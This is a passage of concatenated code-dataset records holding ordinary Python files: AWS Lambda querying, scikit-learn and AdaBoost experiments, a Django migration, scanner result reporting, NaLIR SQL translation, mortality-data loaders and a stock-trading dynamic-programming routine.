query_result.to_csv()\n\n query_hash = hashlib.sha256(query.encode()).hexdigest()\n now_str = str(int(time.time()))\n results_key = \"/\".join((\"-\".join(graph_names), query_hash, f\"{now_str}.csv\"))\n s3_client = boto3.Session().client(\"s3\")\n s3_client.put_object(Bucket=results_bucket, Key=results_key, Body=csv_results)\n\n return {\n \"results_bucket\": results_bucket,\n \"results_key\": results_key,\n \"num_results\": query_result.get_length(),\n }\n\n\ndef get_runquery_lambda_name():\n runquery_lambda_name_prefix = \"ITCloudGraph-RunQuery-\"\n lambda_client = boto3.client(\"lambda\")\n paginator = lambda_client.get_paginator(\"list_functions\")\n for resp in paginator.paginate():\n for func in resp[\"Functions\"]:\n if func[\"FunctionName\"].startswith(runquery_lambda_name_prefix):\n return func[\"FunctionName\"]\n raise ValueError(\n (\n f\"Unable to find a runquery lambda with name starting with \"\n f\"{runquery_lambda_name_prefix}\"\n )\n )\n\n\ndef main(argv=None):\n import argparse\n\n if argv is None:\n argv = sys.argv[1:]\n parser = argparse.ArgumentParser()\n parser.add_argument(\"query_file\", type=str)\n parser.add_argument(\"--graph_names\", type=str, default=[\"alti\"], nargs=\"+\")\n parser.add_argument(\"--max_age_min\", type=int, default=1440)\n args_ns = parser.parse_args(argv)\n\n with open(args_ns.query_file, \"r\") as query_fp:\n query = query_fp.read()\n\n runquery_lambda_name = get_runquery_lambda_name()\n\n payload = {\n \"graph_names\": args_ns.graph_names,\n \"max_age_min\": args_ns.max_age_min,\n \"query\": query,\n }\n payload_bytes = json.dumps(payload).encode(\"utf-8\")\n lambda_client = boto3.client(\"lambda\")\n invoke_lambda_resp = lambda_client.invoke(\n FunctionName=runquery_lambda_name, Payload=payload_bytes\n )\n lambda_resp_bytes = invoke_lambda_resp[\"Payload\"].read()\n lambda_resp_str = lambda_resp_bytes.decode(\"utf-8\")\n lambda_resp = json.loads(lambda_resp_str)\n if \"errorMessage\" in lambda_resp:\n print(\"Error running query:\")\n print(lambda_resp[\"errorMessage\"])\n sys.exit(1)\n results_bucket = lambda_resp[\"results_bucket\"]\n results_key = lambda_resp[\"results_key\"]\n s3_client = boto3.client(\"s3\")\n s3_resp = s3_client.get_object(Bucket=results_bucket, Key=results_key)\n results_bytes = s3_resp[\"Body\"].read()\n results_str = results_bytes.decode(\"utf-8\")\n print(results_str)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"bin/runquery.py","file_name":"runquery.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"338888403","text":"import requests, zipfile, StringIO, gzip\nimport urllib\n\ntestfile = urllib.URLopener()\ntestfile.retrieve(\"http://s3.amazonaws.com/thedataincubator/coursedata/mldata/train.txt.gz\", \"train.txt.gz\")\n\nimport gzip\nwith gzip.open('train.txt.gz', 'rb') as f:\n content = f.readlines()\n\nimport re\nfor line in content:\n re.sub('\\n','',line)\nimport pandas as pd\ndata = pd.read_csv('train.txt.gz',sep=r\"\\s*\",header=None)\ndata.columns = ['year','month','day','hour','temp','dew_temp','pressure','wind_angle','wind_speed','sky_code','rain_hour','rain_6hour','city']\n\n\n# In[6]:\n\ndata.head()\nfrom datetime import datetime\n\n\ndata['time'] = data.apply(lambda x:datetime.strptime(\"{0} {1} {2} {3}:00:00\".format(x['year'],x['month'], x['day'],x['hour']), \"%Y %m %d %H:%M:%S\"),axis=1)\n\n\n# In[41]:\n\ndf = data[['time','temp','dew_temp','pressure','wind_angle','wind_speed','sky_code','rain_hour','rain_6hour','city']]\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn import pipeline\n\n\n# In[56]:\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nclass ColumnSelectTransform(BaseEstimator, TransformerMixin):\n def __init__(self):\n import numpy as np\n import pandas as pd\n pass\n def fit(self,X,y=None):\n return self\n def transform(self, X):\n import numpy as np\n import pandas as pd\n if X == 'train.txt.gz':\n data = pd.read_csv(X,sep=r\"\\s*\",header=None)\n data.columns = ['year','month','day','hour','temp','dew_temp','pressure','wind_angle','wind_speed','sky_code','rain_hour','rain_6hour','city']\n data = data[data.temp != -9999]\n data.city = data.city.replace('bos',1)\n data.city = data.city.replace('bal',2)\n data.city = data.city.replace('chi',3)\n data.city = data.city.replace('nyc',4)\n data.city = data.city.replace('phi',5)\n return np.array(data[['month','day','hour','city']])\n else:\n data = X.split()\n if data[12] == 'bos':\n city = 1\n elif data[12] == 'bal':\n city = 2\n elif data[12] == 'chi':\n city = 3\n elif data[12] == 'nyc':\n city = 4\n elif data[12] == 'phi':\n city=5\n return np.array([int(data[1]),int(data[2]),int(data[3]),city])\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction import DictVectorizer\nmonth_hour_pipe = pipeline.Pipeline([\n ('transformer', ColumnSelectTransform()),\n ('estimator', KNeighborsRegressor(n_neighbors=5))\n ])\nmonth_hour_pipe.fit('train.txt.gz', data[data.temp != -9999].temp)\nimport dill\ndill.dump(month_hour_pipe, open(\"month_hour_pipe\", 'wb'))","sub_path":"work-ts-new.py","file_name":"work-ts-new.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"89027786","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app01', '0080_auto_20180622_1059'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='documentdata',\n name='newpic',\n field=models.ImageField(default='upload_imgss/logo.jpg', verbose_name='封面图片(160x120)', upload_to='upload_imgss'),\n ),\n ]\n","sub_path":"app01/migrations/0081_auto_20180623_2322.py","file_name":"0081_auto_20180623_2322.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"28843081","text":"from datetime import datetime\n\nfrom bo.BusinessObject import BusinessObject\n\n\nclass Article(BusinessObject):\n def __init__(self):\n \"\"\"Artikel, der für eine Gruppe erstellt wird.\"\"\"\n super().__init__()\n self._group = None # nur als id (Fremdschlüssel)\n self._count = 0\n\n def __str__(self):\n return \"Article: {}, part of group: {}\".format(self.get_name(),\n self.get_group())\n\n def get_group(self):\n \"\"\"Auslesen des Fremdschlüssels Gruppe\"\"\"\n return self._group\n\n def get_count(self):\n \"\"\"Auslesen der Anzahl, die der Artikel gekauft wurde\"\"\"\n return self._count\n\n def set_group(self, group_id):\n \"\"\"Setzen des Fremdschlüssels Gruppe\"\"\"\n self._group = group_id\n\n def set_count(self, count):\n \"\"\"Setzen der Anzahl, die der Artikel gekauft wurde\"\"\"\n self._count = count\n\n\n def to_dict(self):\n \"\"\"Umwandeln Article() in ein Python dict()\"\"\"\n result = {\n \"id\": self.get_id(),\n \"name\": self.get_name(),\n \"groupId\": self.get_group(),\n \"count\": self.get_count(),\n \"creationDate\": self.get_creation_date(),\n \"lastUpdated\": self.get_last_updated()\n }\n return result\n\n @staticmethod\n def from_dict(dictionary=dict()):\n \"\"\"Umwandeln eines Python dict() in einen Article()\"\"\"\n article = Article()\n article.set_id(dictionary[\"id\"])\n article.set_name(dictionary[\"name\"])\n article.set_group(dictionary[\"groupId\"])\n article.set_count(dictionary[\"count\"])\n article.set_creation_date(Article.date_format(dictionary[\"creationDate\"]))\n article.set_last_updated(Article.date_format(dictionary[\"lastUpdated\"]))\n return article\n\n @staticmethod\n def from_tuples(tuples=list()):\n \"\"\"Umwandeln eines DB tuples in einen Article() (Python Objekt)\"\"\"\n result = []\n for (article_id, name, creation_date, group, last_updated) in tuples:\n article = Article()\n article.set_id(article_id)\n article.set_name(name)\n article.set_group(group)\n article.set_creation_date(creation_date)\n article.set_last_updated(last_updated)\n result.append(article)\n return result\n","sub_path":"src/bo/Article.py","file_name":"Article.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"519168200","text":"import json\nimport time\nimport threading\nfrom libs.config.config import control_dict\nfrom libs.utils.logger.log import Logger\nfrom libs.utils.redis.connect import connect\n\n\nclass ReportThread(threading.Thread):\n def __init__(self):\n super(ReportThread, self).__init__()\n self.start_at = time.time()\n self.end_at = None\n self.redis_cnt = connect()\n\n def run(self):\n try:\n start = time.strftime(time.strftime('%H:%M:%S', time.localtime(time.time())))\n url = self.redis_cnt.rpop(control_dict['result_report_list']).decode()\n self.api(url)\n self.end_at = time.time()\n end = time.strftime(time.strftime('%H:%M:%S', time.localtime(time.time())))\n log_msg = (\n '[report]: {}\\n'.format(url),\n '[start]: {}\\n'.format(start),\n '[cost]: {}\\n'.format(self.end_at - self.start_at),\n '[end]: {}\\n\\n'.format(end)\n )\n Logger.running(log_msg)\n except AttributeError:\n pass\n except Exception as err_msg:\n log = Logger.error()\n log(err_msg)\n\n def api(self, url):\n\n for script in self.redis_cnt.hkeys('{}_information_gathering_result_list'.format(url)):\n print('\\n')\n print(script.decode())\n script_result = self.redis_cnt.hget('{}_information_gathering_result_list'.format(url), script)\n script_result = json.loads(script_result)\n for result in script_result:\n print(result)\n print('\\n')\n for plugin in self.redis_cnt.hkeys('{}_leak_scanning_result_list'.format(url)):\n print('\\n')\n print(plugin.decode())\n plugin_result = self.redis_cnt.hget('{}_leak_scanning_result_list'.format(url), plugin)\n plugin_result = json.loads(plugin_result)\n for result in plugin_result:\n print(result)\n print('\\n')\n self.redis_cnt.lpush(control_dict['resource_reclaim_list'], url)\n","sub_path":"ControlUnit/libs/core/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"267047606","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.4.2\n# kernelspec:\n# display_name: NaLIR-SBBD\n# language: python\n# name: nalir-sbbd\n# ---\n\nfrom nalir import *\n\nconfig_json_text = '''{\n \"connection\":{\n \"host\": \"localhost\",\n \"password\":\"desenvolvimento123\",\n \"user\":\"nalir\",\n \"database\":\"anp\"\n },\n \"loggingMode\": \"ERROR\",\n \"zfiles_path\":\"/home/novello/nalir-glamorise/zfiles\",\n \"jars_path\":\"/home/novello/nalir-glamorise/jars/new_jars\"\n}\n'''\nconfig = ConfigHandler(reset=True,config_json_text=config_json_text)\n\nrdbms = RDBMS(config)\n\n# nlq_before='What was the monthly production of oil in the state of Rio de Janeiro and year 2015?'\n# change_order = true\n# relace_text = {monthly : per year per month}\n# nlq_after='What was the production of oil per year per month in the state of Rio de Janeiro and year 2015?'\n# nlq_before='What was the the field with the highest gas production?'\n# replace_text_before = {gas production : production of gas} <-- ainda não precisa envelope noun resolve\n# envelope_noun = true\n# relace_text = {highest : per}\n# nlq_after='What was the the field with the per \"production of gas\"?'\n#nlq='What was the \"production of oil\" per \"year\" per \"month\" in the state of Rio de Janeiro and year 2015?'\n\nnlq='What was the the field with the highest anp_gas_production?'\nquery = Query(nlq,rdbms.schema_graph)\n\n# ## Stanford Dependency Parser\n\nStanfordParser(query,config)\nquery.parse_tree\n\n# **Important Note**: The graph vizualitation requires the program [Graphviz](https://graphviz.org/) (alongside with the graphviz python package) to be installed.\n\nquery.parse_tree.show()\n\n# ## Node Mapper\nimport nltk\n#nltk.download('averaged_perceptron_tagger')\n#nltk.download('wordnet')\n#nltk.download('punkt')\nNodeMapper.phrase_process(query,rdbms,config)\n\nquery.parse_tree.show()\n\n# ## Entity Resolution\n\n# The entity pairs denote that two nodes represente the same entity.\n\nentity_resolute(query)\nquery.entities\n\n# ## Tree Structure Adjustor\n\nTreeStructureAdjustor.tree_structure_adjust(query,rdbms)\nquery.query_tree.show()\n\n# ## Explainer\n\nexplain(query)\nquery.query_tree.show()\n\n# ## SQL Translator\n\n# **Important Node**: The error message is resultant of line 191 of file data_structure/block.py\n\ntranslate(query, rdbms)\nprint('nlq: ', nlq)\nprint('query: ', query.translated_sql)\n","sub_path":"NaLIR_ANP.py","file_name":"NaLIR_ANP.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"584220930","text":"import sys\nimport string\nfrom PythonChallenges.Challenge2 import ChallengeTwo\nfrom PythonChallenges.Challenge1 import ChallengeOne, ChallengeOneAlt\nfrom PythonChallenges.Challenge3 import ChallengeThree\nfrom PythonChallenges.Challenge4 import ChallengeFour\n\ndef _printMenu ( ):\n print ()\n print (\"1: Challenge 1.\")\n print (\"1a: Challenge 1 Alt.\")\n print (\"2: Challenge 2.\")\n print (\"3: Challenge 3.\")\n print (\"4: Challenge 4.\")\n print (\"X: Exit\")\n pass\n\ndef _processMenu ( ):\n userInput = input(\"Select an option: \").upper()\n \n if userInput == \"1\":\n ChallengeOne()\n return True\n elif userInput == \"1A\":\n ChallengeOneAlt()\n return True\n elif userInput == \"2\": \n ChallengeTwo()\n return True\n elif userInput == \"3\":\n ChallengeThree()\n return True\n elif userInput == \"4\":\n ChallengeFour()\n return True\n elif userInput == \"X\":\n print ( \"Goodbye.\" )\n return False\n else:\n print ( \"Command not recognized, sorry!\")\n return True\n\ndef RunPythonChallenge():\n \n while True:\n _printMenu()\n if not _processMenu():\n break\n \n \n pass\n\n\n\n","sub_path":"Algorithms/Algorithms/PythonChallenges/PythonChallenge.py","file_name":"PythonChallenge.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"42328673","text":"\"\"\"Upload and download of age-specific death rate, which is\nall-cause mortality rate, by age.\"\"\"\nimport pandas as pd\nfrom numpy import nan\n\nfrom cascade.core.db import cursor, db_queries, repeat_request\nfrom cascade.core.log import getLoggers\nfrom cascade.input_data.db import AGE_GROUP_SET_ID\nfrom cascade.input_data.db.data_iterator import grouped_by_count\nfrom cascade.runner.application_config import application_config\nfrom cascade.stats.estimation import bounds_to_stdev\n\nCODELOG, MATHLOG = getLoggers(__name__)\n\n\ndef _asdr_in_t3(execution_context, model_version_id):\n \"\"\"Checks if data for the current model_version_id already exists in tier 3.\n \"\"\"\n query = \"\"\"\n SELECT DISTINCT location_id\n FROM epi.t3_model_version_asdr\n WHERE model_version_id = %(model_version_id)s\n \"\"\"\n with cursor(execution_context) as c:\n c.execute(query, args={\"model_version_id\": model_version_id})\n location_rows = c.fetchall()\n\n return [row[0] for row in location_rows]\n\n\ndef get_asdr_formatted(choices_dict):\n \"\"\"\n Retrieves ASDR data and formats it so that we know exactly what columns\n there are.\n \"\"\"\n gbd_round_id = choices_dict[\"gbd_round_id\"]\n demo_dict = db_queries.get_demographics(gbd_team=\"epi\", gbd_round_id=gbd_round_id)\n choices_dict.update(dict(\n age_group_id=demo_dict[\"age_group_id\"],\n sex_id=demo_dict[\"sex_id\"],\n ))\n asdr = repeat_request(db_queries.get_envelope)(**choices_dict)\n\n nulls = asdr[\"mean\"].isnull().sum()\n if nulls > 0:\n MATHLOG.info(f\"Removing {nulls} null values from mean of age-specific death rate.\")\n asdr = asdr[asdr[\"mean\"].notnull()]\n\n cols = [\"age_group_id\", \"location_id\", \"year_id\", \"sex_id\", \"mean\", \"upper\", \"lower\"]\n return asdr[cols]\n\n\ndef get_asdr_global(gbd_round_id, decomp_step, location_set_version_id, with_hiv):\n r\"\"\"Gets the age-specific death rate from IHME databases.\n This is :math:`{}_nm_x`, the mortality rate. This gets rates, not counts.\n This gets data for all locations, specified by location set.\n \"\"\"\n CODELOG.debug(f\"get_asdr_global: round {gbd_round_id} decomp {decomp_step}\")\n return get_asdr_formatted(dict(\n location_set_version_id=location_set_version_id,\n location_id=\"all\",\n year_id=-1,\n gbd_round_id=gbd_round_id,\n decomp_step=decomp_step,\n with_hiv=with_hiv,\n rates=True,\n ))\n\n\ndef get_asdr_data(gbd_round_id, decomp_step, location_and_children, with_hiv):\n r\"\"\"Gets the age-specific death rate from IHME databases.\n This is :math:`{}_nm_x`, the mortality rate. This gets rates, not counts.\n Gets data only for locations specified.\n \"\"\"\n CODELOG.debug(f\"get_asdr_data round {gbd_round_id} decomp {decomp_step} \"\n f\"for locations {location_and_children}\")\n return get_asdr_formatted(dict(\n location_id=list(location_and_children),\n year_id=-1,\n gbd_round_id=gbd_round_id,\n decomp_step=decomp_step,\n with_hiv=with_hiv,\n rates=True,\n ))\n\n\ndef asdr_as_fit_input(\n location_set_version_id, included_locations, sexes, gbd_round_id,\n decomp_step, ages_df, with_hiv\n):\n r\"\"\"Gets age-specific death rate (ASDR) from database and formats as\n input data. This is :math:`{}_nm_x`, the mortality rate by age group.\n Returns rates, not counts.\n\n Args:\n location_set_version_id (int): Location set version for which\n to retrieve the data. This is all locations.\n included_locations (List[int]): The locations in this run.\n If the locations we need are less than ``small-location-count``,\n then retrieve data only for those locations.\n sexes (List[int]): 1, 2, 3, or 4. Sex_id.\n gbd_round_id (int): GBD round identifies consistent data sets.\n ages_df (pd.DataFrame): Age_id to age mapping.\n with_hiv (bool): whether to include HIV deaths in mortality.\n\n Returns:\n pd.DataFrame: Columns are ``integrand``, ``hold_out``, ``density``,\n ``eta``, ``nu``, ``time_lower``, ``time_upper``, ``age_lower``,\n ``age_upper``, and ``location``, ``sex_id``.\n \"\"\"\n parameters = application_config()[\"NonModel\"]\n # Why not download all every time? It's really slow for testing.\n small_number_locations = parameters.getint(\"small-location-count\")\n if included_locations is not None and len(included_locations) < small_number_locations:\n # Call db_queries multiple times because it uses the SQL in set()\n # syntax, which fails when the set is large.\n locations_per_query = parameters.getint(\"locations-per-query\")\n multiple_asdr = list()\n for location_bunch in grouped_by_count(included_locations, locations_per_query):\n piece = get_asdr_data(gbd_round_id, decomp_step, location_bunch, with_hiv)\n multiple_asdr.append(piece)\n asdr = pd.concat(multiple_asdr, axis=0, ignore_index=True, sort=False)\n CODELOG.debug(f\"asdr_as_fit_input Retrieving {len(asdr)} ASDR for {included_locations}.\")\n else:\n asdr = get_asdr_global(gbd_round_id, decomp_step, location_set_version_id, with_hiv)\n CODELOG.debug(\n f\"asdr_as_fit_input Retrieving {len(asdr)} ASDR for \"\n f\"location_set_version_id {location_set_version_id}.\")\n assert not (set(asdr.age_group_id.unique()) - set(ages_df.age_group_id.values))\n return asdr_by_sex(asdr, ages_df, sexes)\n\n\ndef asdr_by_sex(asdr, ages, sexes):\n \"\"\"Incoming age-specific death rate has ``age_id`` and upper and lower\n bounds. This translates those into age-ranges, time-ranges, and standard\n deviations.\"\"\"\n CODELOG.debug(f\"asdr_by_sex for sexes {sexes}\")\n without_weight = ages.drop(columns=[\"age_group_weight_value\"])\n as_up_low = without_weight.rename({\"age_group_years_start\": \"age_lower\", \"age_group_years_end\": \"age_upper\"},\n axis=\"columns\")\n with_ages = asdr.merge(as_up_low, on=\"age_group_id\", how=\"left\")\n with_upper = with_ages.assign(time_upper=with_ages.year_id + 1)\n with_times = with_upper.rename(columns=dict(year_id=\"time_lower\", location_id=\"location\"))\n with_std = with_times.assign(std=bounds_to_stdev(with_times.lower, with_times.upper))\n rest = with_std.assign(\n integrand=\"mtother\",\n hold_out=0,\n density=\"gaussian\",\n eta=nan,\n nu=nan,\n )\n trimmed = rest.drop(columns=[\"age_group_id\", \"upper\", \"lower\"])\n return trimmed.query(\"sex_id in @sexes\")\n\n\ndef _upload_asdr_data_to_tier_3(gbd_round_id, cursor, model_version_id, asdr_data):\n \"\"\"Uploads ASDR data to tier 3 attached to the current model_version_id.\n \"\"\"\n\n insert_query = f\"\"\"\n INSERT INTO epi.t3_model_version_asdr (\n model_version_id,\n year_id,\n location_id,\n sex_id,\n age_group_id,\n mean,\n upper,\n lower,\n age_upper,\n age_lower\n ) VALUES (\n {model_version_id}, {\", \".join([\"%s\"]*9)}\n )\n \"\"\"\n\n age_group_data = db_queries.get_age_metadata(\n age_group_set_id=AGE_GROUP_SET_ID, gbd_round_id=gbd_round_id\n )[[\"age_group_id\", \"age_group_years_start\", \"age_group_years_end\"]]\n\n age_group_data = age_group_data.rename(columns={\n \"age_group_years_start\": \"age_lower\",\n \"age_group_years_end\": \"age_upper\"\n })\n asdr_data = asdr_data.merge(age_group_data, how=\"left\", on=\"age_group_id\")\n asdr_data = asdr_data.where(pd.notnull(asdr_data), None)\n\n ordered_cols = [\n \"year_id\",\n \"location_id\",\n \"sex_id\",\n \"age_group_id\",\n \"mean\",\n \"upper\",\n \"lower\",\n \"age_upper\",\n \"age_lower\",\n ]\n asdr_data = asdr_data[ordered_cols]\n cursor.executemany(insert_query, asdr_data.values.tolist())\n CODELOG.debug(f\"uploaded {len(asdr_data)} lines of asdr data\")\n\n\ndef load_asdr_to_t3(execution_context, data_access, location_and_children):\n \"\"\"\n Upload to t3_model_version_asdr if it's not already there.\n \"\"\"\n model_version_id = data_access.model_version_id\n gbd_round_id = data_access.gbd_round_id\n database = execution_context.parameters.database\n locations_with_asdr_in_t3 = _asdr_in_t3(execution_context, model_version_id)\n missing_from_t3 = set(location_and_children) - set(locations_with_asdr_in_t3)\n if missing_from_t3:\n CODELOG.info(\n f\"\"\"Uploading ASDR data for model_version_id\n {model_version_id} on '{database}'\"\"\"\n )\n asdr_data = get_asdr_data(gbd_round_id, data_access.decomp_step, list(missing_from_t3), data_access.with_hiv)\n\n with cursor(execution_context) as c:\n _upload_asdr_data_to_tier_3(gbd_round_id, c, model_version_id, asdr_data)\n\n return True\n else:\n CODELOG.info(\n f\"\"\"ASDR data for model_version_id {model_version_id}\n on '{database}' already exists, doing nothing.\"\"\"\n )\n return False\n","sub_path":"src/cascade/input_data/db/asdr.py","file_name":"asdr.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"461168881","text":"# @Author: phd\n# @Date: 2019-11-08\n# @Site: github.com/phdsky\n# @Description: NULL\n\nimport time\nimport logging\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Binarizer\n\n\ndef log(func):\n def warpper(*args, **kwargs):\n start_time = time.time()\n ret = func(*args, **kwargs)\n\n end_time = time.time()\n logging.debug(\"%s() cost %s seconds\" % (func.__name__, end_time - start_time))\n\n return ret\n\n return warpper\n\n\ndef calc_accuracy(y_pred, y_truth):\n assert len(y_pred) == len(y_truth)\n n = len(y_pred)\n\n hit_count = 0\n for i in range(0, n):\n if y_pred[i] == y_truth[i]:\n hit_count += 1\n\n print(\"Accuracy %f\\n\" % (hit_count / n))\n\n return hit_count / n\n\n\ndef sign(x):\n if x >= 0:\n return 1\n elif x < 0:\n return -1\n else:\n print(\"Sign function input wrong!\\n\")\n\n\nclass AdaBoost(object):\n def __init__(self, X_train, y_train, max_classfifers):\n self.X = X_train\n self.Y = y_train\n\n self.sample_num = len(X_train) # sample num\n self.feature_num = len(X_train[0]) # feature num\n self.D = np.full(self.sample_num, (1./self.sample_num)) # weight distribution\n\n self.M = max_classfifers # max classifier number\n self.axis = np.full(self.M, -1) # min ei axis selected\n self.alpha = np.zeros(self.M)\n self.Gm = np.zeros(self.M) # basic classifier\n\n self.thresh_array = np.arange(np.min(self.X)-0.5, np.max(self.X)+0.51, 1)\n self.direction = np.full(self.M, -1)\n\n def basic_classifier(self, threshold, value, direction):\n if direction == 0:\n if value < threshold:\n return 1\n else:\n return -1\n elif direction == 1:\n if value > threshold:\n return 1\n else:\n return -1\n else:\n print(\"WTF the operation direction is?\")\n\n def train_basic_classifier(self, classifier):\n # After binarization, the value is 0 ~ 1, so the\n # threshold should be [-0.5, 0.5, 1.5]\n # For multi dimensional data, choose the axis which\n # has the min ei value to take part in decision\n min_ei = self.sample_num # all weight is 1 and hit\n selected_axis = -1\n threshold = self.thresh_array[-1] + 1\n\n direction_array = [0, 1]\n direction = -1\n\n for axis in range(self.feature_num):\n for th in self.thresh_array:\n axis_vector = self.X[:, axis]\n thresh_vector = np.full(self.sample_num, th)\n\n for direct in direction_array:\n # Use vector format calculation for accelerating\n if direct == 0:\n compare_vector = np.asarray([axis_vector < thresh_vector], dtype=int) * 2 - 1\n elif direct == 1:\n compare_vector = np.asarray([axis_vector > thresh_vector], dtype=int) * 2 - 1\n\n calc_ei = np.sum((compare_vector != self.Y)*self.D)\n\n # calc_ei = 0.\n # for sample in range(self.sample_num):\n # calc_ei += self.D[sample]*\\\n # int(self.basic_classifier(thresh, self.X[sample][axis]) != self.Y[sample])\n\n if calc_ei < min_ei:\n min_ei = calc_ei\n selected_axis = axis\n threshold = th\n direction = direct\n\n self.axis[classifier] = selected_axis\n self.Gm[classifier] = threshold\n self.direction[classifier] = direction\n\n return min_ei\n\n @log\n def train(self):\n m = 0\n while m < self.M:\n print(\"Training %d classifier...\" % m)\n\n # Train basic classifier and classify error\n ei = self.train_basic_classifier(classifier=m)\n\n # Calculate alpha value\n self.alpha[m] = 0.5*np.log((1 - ei) / ei)\n\n # Validate training\n train_label = self.predict(X_test=self.X, classifier_number=(m + 1))\n accuracy = calc_accuracy(train_label, self.Y)\n\n if accuracy == 1.:\n print(\"Fitting perfect on training set!\")\n return m + 1\n\n # Calculate regulator\n Zm = 0.\n for i in range(self.sample_num):\n Zm += self.D[i] * np.exp(-self.alpha[m]*self.Y[i] *\n self.basic_classifier(self.Gm[m], self.X[i][self.axis[m]], self.direction[m]))\n\n # Update weight distribution\n for i in range(self.sample_num):\n self.D[i] = self.D[i] * np.exp(-self.alpha[m]*self.Y[i] *\n self.basic_classifier(self.Gm[m], self.X[i][self.axis[m]], self.direction[m])) / Zm\n\n m += 1\n\n return m\n\n # @log\n def predict(self, X_test, classifier_number):\n n = len(X_test)\n predict_label = np.full(n, -1)\n\n for i in range(n):\n to_predict = X_test[i]\n result = 0.\n\n for m in range(classifier_number):\n result += self.alpha[m] * self.basic_classifier(self.Gm[m], to_predict[self.axis[m]], self.direction[m])\n\n predict_label[i] = sign(result)\n\n return predict_label\n\n\ndef example_large():\n mnist_data = pd.read_csv(\"../data/mnist_binary.csv\")\n mnist_values = mnist_data.values\n\n images = mnist_values[::, 1::]\n labels = mnist_values[::, 0]\n\n X_train, X_test, y_train, y_test = train_test_split(\n images, labels, test_size=0.33, random_state=42\n )\n\n # Binary the images to avoid AdaBoost classifier threshold complex\n binarizer_train = Binarizer(threshold=127).fit(X_train)\n X_train_binary = binarizer_train.transform(X_train)\n\n binarizer_test = Binarizer(threshold=127).fit(X_test)\n X_test_binary = binarizer_test.transform(X_test)\n\n adaboost = AdaBoost(X_train=X_train_binary, y_train=y_train, max_classfifers=233)\n\n print(\"AdaBoost training...\")\n classifier_trained = adaboost.train()\n print(\"\\nTraining done...\")\n print(\"\\nTraining done with %d classifiers!\" % classifier_trained)\n\n print(\"Testing on %d samples...\" % len(X_test))\n y_predicted = adaboost.predict(X_test=X_test_binary, classifier_number=classifier_trained)\n\n calc_accuracy(y_pred=y_predicted, y_truth=y_test)\n\n\ndef example_small():\n X_train = np.asarray([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9]])\n y_train = np.asarray([1, 1, 1, -1, -1, -1, 1, 1, 1, -1])\n\n adaboost = AdaBoost(X_train=X_train, y_train=y_train, max_classfifers=5)\n\n print(\"Adaboost training...\")\n classifier_trained = adaboost.train()\n print(\"\\nTraining done with %d classifiers!\" % classifier_trained)\n\n\nif __name__ == \"__main__\":\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # example_large()\n example_small()\n","sub_path":"boosting/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"12914771","text":"import sys\nimport operator\nimport numpy as np\nimport pandas as pd\ndef myOptimActionOne(priceVec, transFeeRate, use_DP=True):\n\t\n\t_BUY = 1\n\t_HOLD = 0\n\t_SELL = -1\n\n\tdataLen = len(priceVec)\n\tactionVec = np.zeros(dataLen)\n\n\t# Dynamic Programming method\n\tif use_DP:\n\t\tcapital = 1\n\t\tmoney = [{'money' : 0, 'from' : 0 } for _ in range(dataLen)]\n\t\tstock = [{'stock' : 0, 'from' : 1 } for _ in range(dataLen)]\n\n\t\t# DP initialization\n\t\tmoney[0]['money'] = capital\n\t\tstock[0]['stock'] = capital * (1 - transFeeRate) / priceVec[0]\n\n\t\t# DP recursion\n\t\tfor t in range(1, dataLen):\n\t\t\t\n\t\t\t# find optimal for sell at time t:\n\t\t\thold = money[t - 1]['money']\n\t\t\tsell = stock[t - 1]['stock'] * priceVec[t] * (1 - transFeeRate)\n\n\t\t\tif hold > sell:\n\t\t\t\tmoney[t]['money'] = hold\n\t\t\t\tmoney[t]['from'] = 0\n\t\t\telse:\n\t\t\t\tmoney[t]['money'] = sell\n\t\t\t\tmoney[t]['from'] = 1\n\n\t\t\t# find optimal for buy at time t:\n\t\t\thold = stock[t - 1]['stock']\n\t\t\tbuy = money[t - 1]['money'] * (1 - transFeeRate) / priceVec[t]\n\n\t\t\tif hold > buy:\n\t\t\t\tstock[t]['stock'] = hold\n\t\t\t\tstock[t]['from'] = 1\n\t\t\telse:\n\t\t\t\tstock[t]['stock'] = buy\n\t\t\t\tstock[t]['from'] = 0\n\n\t\t# must sell at T\n\t\tprev = 0\n\t\tactionVec[-1] = _SELL\n\n\t\t# DP trace back\n\t\trecord = [money, stock]\n\t\tfor t in reversed(range(1, dataLen)):\n\t\t\tprev = record[prev][t]['from']\n\t\t\tactionVec[t - 1] = _SELL if prev == 0 else 